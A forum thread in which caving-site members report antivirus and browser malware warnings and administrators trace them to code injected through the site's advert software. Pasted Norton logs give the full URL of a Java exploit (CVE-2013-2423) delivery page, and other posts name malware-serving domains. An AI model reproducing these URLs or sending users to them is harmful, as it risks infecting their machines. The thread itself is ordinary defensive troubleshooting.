Author Topic: Virus attack  (Read 7719 times)

Online Laurie

  • forum hero
  • *****
  • Posts: 1722
  • MNRC
Virus attack
« on: December 28, 2012, 12:06:48 pm »
Earlier today my anti-virus software locked me out of the forum.
Seems OK now.
Has someone dealt with it?
2015 - Green insurance card swapped for a red one :(

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #1 on: December 28, 2012, 12:33:16 pm »
My Kaspersky threw up a "Trojan  -  access denied" flash when I logged on just now. 

For the backroom boys' info, it is logged as being at http://domaingranted(dot)net(slash)B6jsr(and a lot of other stuff)...UkK17p8b/pdfx(dot)html

I can provide the missing bit in the middle if anyone needs it.

Roger
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkein: "The Hobbit"

Offline bograt

  • forum hero
  • *****
  • Posts: 3509
  • Speliodecrepit
Re: Virus attack
« Reply #2 on: December 28, 2012, 12:54:52 pm »
My Norton AV nobbled the same one when I first logged on to this site today as well.
Aim low, achieve your goals, avoid disappointment

Offline rhychydwr1

  • forum hero
  • *****
  • Posts: 3004
  • Russian, the best
    • http://www.showcaves.com
Re: Virus attack
« Reply #3 on: December 28, 2012, 12:55:40 pm »
Same happened to me but AVIS wiped it.

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #4 on: December 28, 2012, 04:43:34 pm »
Just logged back on again, another "malicious url" denied...

Looks like were,re under attack...    >:(
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkein: "The Hobbit"

Offline Anon

  • Nobody
  • Newbie
  • *
  • Posts: 2
Re: Virus attack
« Reply #5 on: December 28, 2012, 05:26:13 pm »
Can't say I've noticed anything, are the above using IE?

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #6 on: December 28, 2012, 05:38:38 pm »
Can the people who've had this issue please give as much information as they can?

e.g.

- full error message from the AV software
- which AV software
- which browser (+version)
- OS

I've not noticed anything untoward at all whilst using the site using FF17 on Windows and I do run AV and anti-malware scanners.
=:blubba:=

[ nsfw ]

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #7 on: December 28, 2012, 07:09:58 pm »
Me too, FF17.0.1 & no problems (except with the mod who doesn't have a sense of humour.)
Caving is for Life not just for Christmas

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #8 on: December 28, 2012, 07:29:18 pm »
Using IE9 and Kaspersky Internet Security 2012.

Operating system:  Windows 7

Have logged on and off again 3/4 times today.

First time, Kaspersky denied a Trojan (HEUR: Trojan.Script.Generic):

http://domaingranted( dot )net/B6jsra0jwqq01bI80( I'm putting a gap in here 'cos I don't want to risk posting an active doodah )WW0ggsq0sMbY0ZEjJ0IN6J0XwG10OxND0jymk0YRv009FiY0icJw172l30QUkK17p8b/pdfx( dot )html

Next two times, denied phishing URL:

http://rtffeatureand( dot )org/5u3FLR02z3b0eRLx0GQu( space as before )T0e4DX0LicG0fcJB0zCua0Dwyt0NK3o05i1Y0Obm30ugiq11e7V0yH0w0WQei0N0PK/

This last time, got the phishing ULR when I went on UKCaving and then the Trojan when I actually logged on.

Roger
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkein: "The Hobbit"

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #9 on: December 28, 2012, 08:08:20 pm »
The two domains (domaingranted and rtffeatureand) both seem to be dodgy URLs (Chrome flags them as malicious), as correctly identified by your copy of Kaspersky, which is why it's doing it's job blocking them.

The question is why are you getting these when you're using ukcaving?

Is ukcaving.com the only site that is causing this issue? It might be worth trying some other randomly chosen SMF based forums that are unrelated, for example: this one or this one  - do either of these throw up problems?

Have you tried using a different browser like Firefox or Chrome? Same issues?

I'm running Win 7 and have checked ukcaving using IE9 without issue. I've also checked for any server changes and can't see any.

I'm not by any means a web security expert but when we've had problems like this before it's generally down to the user's machine being infected by some adware/malware.

I would suggest using your AV to do a full system scan. I would also download and do a full scan using Malwarebytes Anti Malware and something like Spybot

If all that comes back negative then we probably have an issue on the server but given that some of us are using the site without issue I'm inclined to think that perhaps your machine has a nasty on it.  I'm sorry if this isn't what you want to hear but I hope I'm right and the server hasn't been compromised.

=:blubba:=

[ nsfw ]

Offline flexx

  • regular
  • *
  • Posts: 31
  • ChCC
Re: Virus attack
« Reply #10 on: December 28, 2012, 10:36:32 pm »
just checked my unread posts since last visit and avg blocked a trojan

Offline Alex

  • forum hero
  • *****
  • Posts: 3489
  • BRCC, UWFRA.
Re: Virus attack
« Reply #11 on: January 02, 2013, 10:12:38 pm »
I ended up with a virus at around that date, did not think UKcaving caused it, it could have been unrelated but I spent a good 4 hours getting rid of it and restoring firewalls etc. It was a nasty virus that infected servies.exe which of course crashed the computer when AVG tried to remove it. With that fixed (from a windows 7 cd) I had to spend several hours restoring my firewall, windows defender and other services the virus messed with.
Anything I say is represents my own opinion and not that of a any club/organisation that I am a member of (unless its good of course)

Offline Roger W

  • forum hero
  • *****
  • Posts: 2045
Re: Virus attack
« Reply #12 on: January 03, 2013, 10:09:27 am »
I ran a full scan with Kaspo and the Widows defender thingy - both came up negative.  Cleared everything out on IE9 and seem to have got rid of the problem - fingers crossed.
"That, of course, is the dangerous part about caves:  you don't know how far they go back, sometimes... or what is waiting for you inside."   JRR Tolkein: "The Hobbit"

Offline bograt

  • forum hero
  • *****
  • Posts: 3509
  • Speliodecrepit
Re: Virus attack
« Reply #13 on: January 03, 2013, 01:17:42 pm »
I have had no recurrence since Norton zapped it.
Aim low, achieve your goals, avoid disappointment

Offline danthecavingman

  • forum star
  • ****
  • Posts: 665
  • Don't follow too close.....
Re: Virus attack
« Reply #14 on: June 14, 2013, 07:28:52 pm »
Evening all, just now from my Norton 360 as I logged in:

Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Risk, High
Activity,An intrusion attempt by 53df:7d06::0 was blocked
Status,Blocked
Recommended Action,No Action Required
IPS Alert Name,Web Attack: Java CVE-2013-2423 RCE
Default Action,No Action Required
Action Taken,No Action Required
Attacking Computer,"53df:7d06::0, 80"
Attacker URL,"www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=atom.jar&k=5358709419027932&h=bc5c75e226ea4554"
Destination Address, "c0a8:146::801:740a:80fa:ffff, 50442",
Source Address, 53df:7d06::0
Traffic Description "TCP, www-http"
Network traffic from <b>www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=atom.jar&k=5358709419027932&h=bc5c75e226ea4554</b> matches the signature of a known attack.  The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.
To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.

You see that Taxus baccata.........that's Yew that is........

Offline danthecavingman

  • forum star
  • ****
  • Posts: 665
  • Don't follow too close.....
Re: Virus attack
« Reply #15 on: June 14, 2013, 07:40:29 pm »
Guys,

This as well....

Category: Intrusion Prevention
Date & Time, 2013-06-14 19:18:52
Risk, High
Activity,An intrusion attempt by 53df:7d06::0 was blocked
Status, Blocked
Recommended Action, No Action Required
IPS Alert Name, Web Attack: Malicious Java File Download 9
Default Action, No Action Required
Action Taken, No Action Required
Attacking Computer, 53df:7d06::0, 80
Attacker URL, www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=site.jar&k=5358709419027910&h=bc5c75e226ea4554
Destination Address, c0a8:146::801:740a:80fa:ffff, 50443
Source Address, 53df:7d06::0
Traffic Description TCP, www-http
Network traffic from <b>www.communicatemagazine.co.uk/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/images/.cache/?f=site.jar&k=5358709419027910&h=bc5c75e226ea4554</b> matches the signature of a known attack.  The attack was resulted from \DEVICE\HARDDISKVOLUME3\PROGRAM FILES (X86)\JAVA\JRE7\BIN\JAVA.EXE.  To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.

You see that Taxus baccata.........that's Yew that is........

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #16 on: June 14, 2013, 08:33:17 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
=:blubba:=

[ nsfw ]

Online RobinGriffiths

  • junky
  • ****
  • Posts: 828
Re: Virus attack
« Reply #17 on: June 14, 2013, 08:58:25 pm »
tiny_mce a wysiwyg browser based html editor. I've used it in the past at work. The url at which the javascript is referenced might be compromised ?

Offline AR

  • Black shadow
  • junky
  • ****
  • Posts: 863
  • PDMHS, ATAC, ANHMS
Re: Virus attack
« Reply #18 on: June 14, 2013, 10:52:32 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.

Seconded, Oracle are notoriously slack at  sorting the vulnerabilities in JRE. If you're on Firefox, the Noscript add-in is worth having too!
Dirty old mines need love too....

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #19 on: June 14, 2013, 11:29:10 pm »
tiny_mce a wysiwyg browser based html editor. I've used it in the past at work. The url at which the javascript is referenced might be compromised ?

Certain versions of tiny_mce are well known to web developers like myself for having exploits and vulnerabilities. Upgrade to later versions or stop using them.

Regards, Mel.
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.

Offline underground

  • junky
  • ****
  • Posts: 809
Re: Virus attack
« Reply #20 on: June 15, 2013, 08:05:45 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
Interesting, I'm sick of java autoupdater, is that a general recommendation or specific to this issue dude?

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #21 on: June 15, 2013, 08:13:26 pm »

I'd remove Java completely unless you have a particular need for it. 

I'd certainly remove Java plugins from all browsers.
Interesting, I'm sick of java autoupdater, is that a general recommendation or specific to this issue dude?

It's a general recommendation. Java is hellishly buggy and full of exploitable problems. Trouble is a have one very specific need for it.

P.S. Does this mean I am a 'dude'?   :-\
Caving is for Life not just for Christmas

Offline estelle

  • obsessive maniac
  • ***
  • Posts: 450
  • GSG & BEC - Everything to Excess!
Re: Virus attack
« Reply #22 on: June 16, 2013, 09:20:59 pm »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!
What you say about me says more about you than it does about me.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #23 on: June 16, 2013, 09:47:23 pm »
We've had a few such reports in the last few days.  I can access the site using IE/FF/Chrome with no issues so I don't believe it's an issue with the server, possibly a false alarm with Chrome.

Thanks for the warning anyway...
=:blubba:=

[ nsfw ]

Offline bagpuss

  • obsessive maniac
  • ***
  • Posts: 473
Re: Virus attack
« Reply #24 on: June 16, 2013, 09:50:40 pm »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!

I've got the same thing with Chrome & also my virus checker..

Offline ttxela

  • junky
  • ****
  • Posts: 796
  • WCMS, PDMHS
Re: Virus attack
« Reply #25 on: June 16, 2013, 09:51:54 pm »
Sophos warns that it's blocked malware when I access the site and every time I move to a new page within the site  :-\

Mal/HTML -GenA whatever that means  ::)
If you've been affected by any of the issues raised in this post you can contact our helpline on 0800........

Offline Anon

  • Nobody
  • Newbie
  • *
  • Posts: 2
Re: Virus attack
« Reply #26 on: June 16, 2013, 09:57:28 pm »
Chrome threw up a malware warning for me too.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #27 on: June 16, 2013, 10:02:33 pm »
All of a sudden, we're getting a load of these this evening...

Weird coz I don't have an issue using IE, FF or Chrome.

Not sure if this is a false alert or there is a genuine issue. Will investigate...
=:blubba:=

[ nsfw ]

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #28 on: June 16, 2013, 10:03:44 pm »
Just accessed ukbouldering/ukcaving using Chrome and I don't get any mesage...weird
=:blubba:=

[ nsfw ]

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #29 on: June 16, 2013, 10:14:22 pm »
Ok, Toby (site overlord) has done some digging and it appears that this problem has been caused by an old (3 years) post on ukbouldering.com linking to a site that is now serving malware.

Because ukbouldering.com an ukcaving.com are served from the same IP, we have been flagged as well.

I'm confident that this is a non-issue and you can carry on using the site as usual.
=:blubba:=

[ nsfw ]

Offline menacer

  • junky
  • ****
  • Posts: 987
  • Craven Pothole Club
Re: Virus attack
« Reply #30 on: June 17, 2013, 08:37:28 am »
I would like to thank whoever or whatever evil bot or link caused this. Chris aka the cap n has not been able to get on the site with either FF or Chrome ( because he didnt read the info properly..shhhh) . Im getting loads done round the house in this downtime. :thumbsup:

Ps im using safari on the ipad no problems
Chaos, panic, and disorder - my work here is done.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #31 on: June 17, 2013, 08:43:28 am »
We're confident that this has now been fixed.

Browsers may continue to flag the site as malicious for some time though...
=:blubba:=

[ nsfw ]

Offline mrodoc

  • forum hero
  • *****
  • Posts: 2341
    • Peter Glanvill's Webpage
Re: Virus attack
« Reply #32 on: June 17, 2013, 09:12:50 am »
Same here this am.

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #33 on: June 17, 2013, 09:19:44 am »
google chrome just warned me not to come here too for risk of malware... firefox didn't have a problem though!

I've got the same thing with Chrome & also my virus checker..

I got the same thing with Firefox and my normal Linux system that I use every day. I disconnected my t-mobile broadband dongle, reconnected it and the forum came up no problem! Maybe IP address related?
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #34 on: June 17, 2013, 09:37:00 am »
The problem was with the software that feeds the banner adverts into the forum.  Somebody had managed to insert some code into the database that pulled in some malicious code from a third party website.

The code has now been removed and the advert software patched to the latest version.
=:blubba:=

[ nsfw ]

Offline mmilner

  • Experienced digging / conservation juggling
  • forum hero
  • *****
  • Posts: 1169
  • Outside Handshake Cave, Manifold Valley.
    • Darfar P.C. web site
Re: Virus attack
« Reply #35 on: June 17, 2013, 10:29:37 am »
Nice one!  :thumbsup:

I had a similar problem with a clients web site. He had inserted some code via the wysiwyg editor pulling in similar stuff. I removed that and all was well again!
Norbert Casteret (Ten Years Under the Earth) and Pierre Chevalier (Subterranean Climbers) were my inspiration to start caving. (And I'm still doing it.) Secretary, Darfar Potholing Club, the Peak District.

Offline ah147

  • forum star
  • ****
  • Posts: 701
Re: Virus attack
« Reply #36 on: June 17, 2013, 12:42:09 pm »
I'm still getting issues with it. Is there anything I/admin can do to stop the problem occurring?

Chrome, windows 7

Offline graham

  • Retired
  • forum hero
  • *****
  • Posts: 10943
  • UBSS, Speleo-Club de Perigueux, GSG, SUI
    • UBSS
Re: Virus attack
« Reply #37 on: June 17, 2013, 12:56:01 pm »

The code has now been removed and the advert software patched to the latest version.


Interesting, 'cos it is only now showing as an attack site for me.  :-\
Caving is for Life not just for Christmas

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #38 on: June 17, 2013, 12:57:03 pm »
The problem has been fixed, however this takes time to be recognised by the bodies that flag sites as bad so it'll still come up with the warning until we've been whitelisted again.

No idea how long this takes but for now the site is safe to use.
=:blubba:=

[ nsfw ]

Offline marlboroman

  • Newbie
  • *
  • Posts: 9
Re: Virus attack
« Reply #39 on: June 17, 2013, 01:12:05 pm »
I've today is the first time seen warning had to try few different things to get on site to post this is the information i got from the message it seem to be this site that is compiling the lists of untrusted sites https://www.stopbadware.org
in full cant attach file it seems

Diagnostic page for ukcaving.com
What is the current listing status for ukcaving.com?
Site is listed as suspicious - visiting this web site may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site?
Of the 40 pages we tested on the site over the past 90 days, 20 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-06-16, and the last time suspicious content was found on this site was on 2013-06-16.
This site was hosted on 1 network(s) including AS6428 (CDM).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, ukcaving.com did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
                                                                                                                                                               

Diagnostic page for AS6428 (CDM)
What happened when Google visited sites hosted on this network?
Of the 871 site(s) we tested on this network over the past 90 days, 57 site(s), including, for example, ukbouldering.com/, babesandtoys.com/, topdogbreeders.com/, served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2013-06-16, and the last time suspicious content was found was on 2013-06-16.
Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, we found 7 site(s) on this network, including, for example, erosdiva.com/, villasexxx.com/, mikespr0nsitereviews.com/, that appeared to function as intermediaries for the infection of 10 other site(s) including, for example, picnapper.com/, inew.ru/, sesso-internet.com/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 6 site(s), including, for example, openeros.com/, lapeches.com/, egmontkeyferry.com/, that infected 10 other site(s), including, for example, tinyurl.com/, search-metrotampabay.com/, sesso-internet.com/.
Next steps:
Return to the previous page.


Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #40 on: June 17, 2013, 02:09:56 pm »
Yep, I've already contacted them to request we're removed from their blacklist, but I suspect it relies on Toby contacting Google first and he's away from his computer at the moment.
=:blubba:=

[ nsfw ]

Offline kay

  • Not a
  • forum hero
  • *****
  • Posts: 2536
Re: Virus attack
« Reply #41 on: June 17, 2013, 10:05:52 pm »

I'm confident that this is a non-issue and you can carry on using the site as usual.

Trouble is, only way to find out that you can still use it is to ignore the warnings and use it anyway  :tease:
getstats - A society in which our lives and choices are enriched by an understanding of statistics. Go to www.getstats.org.uk for more information

Offline Duncan Price

  • forum star
  • ****
  • Posts: 530
Re: Virus attack
« Reply #42 on: June 17, 2013, 10:28:08 pm »
IPS Alert Name,Web Attack: Java CVE-2013-2423 RCE

Just cleared this one as well.  Took two full scans and disabling Java to nuke it.

In other news, I recently had my (dormant) Yahoo! account compromised and have since been spammed from other cavers' Yahoo! accounts.  See here

Offline bubba

  • Administrator
  • forum hero
  • *****
  • Posts: 2736
Re: Virus attack
« Reply #43 on: June 17, 2013, 11:03:09 pm »

I'm confident that this is a non-issue and you can carry on using the site as usual.

Trouble is, only way to find out that you can still use it is to ignore the warnings and use it anyway  :tease:

Very true Kay :)

I recommend using Sandboxie for this sort of thing if it happens again...you can then proceed to ignore all the virus/malware warnings safe in the knowledge that your computer can't be compromised.
=:blubba:=

[ nsfw ]

Offline ah147

  • forum star
  • ****
  • Posts: 701
Re: Virus attack
« Reply #44 on: June 17, 2013, 11:16:44 pm »
Just logged in no issues!  ;D

Offline kay

  • Not a
  • forum hero
  • *****
  • Posts: 2536
Re: Virus attack
« Reply #45 on: June 18, 2013, 08:09:19 am »
Just logged in no issues!  ;D

Same here - looks like your good name has been restored!
getstats - A society in which our lives and choices are enriched by an understanding of statistics. Go to www.getstats.org.uk for more information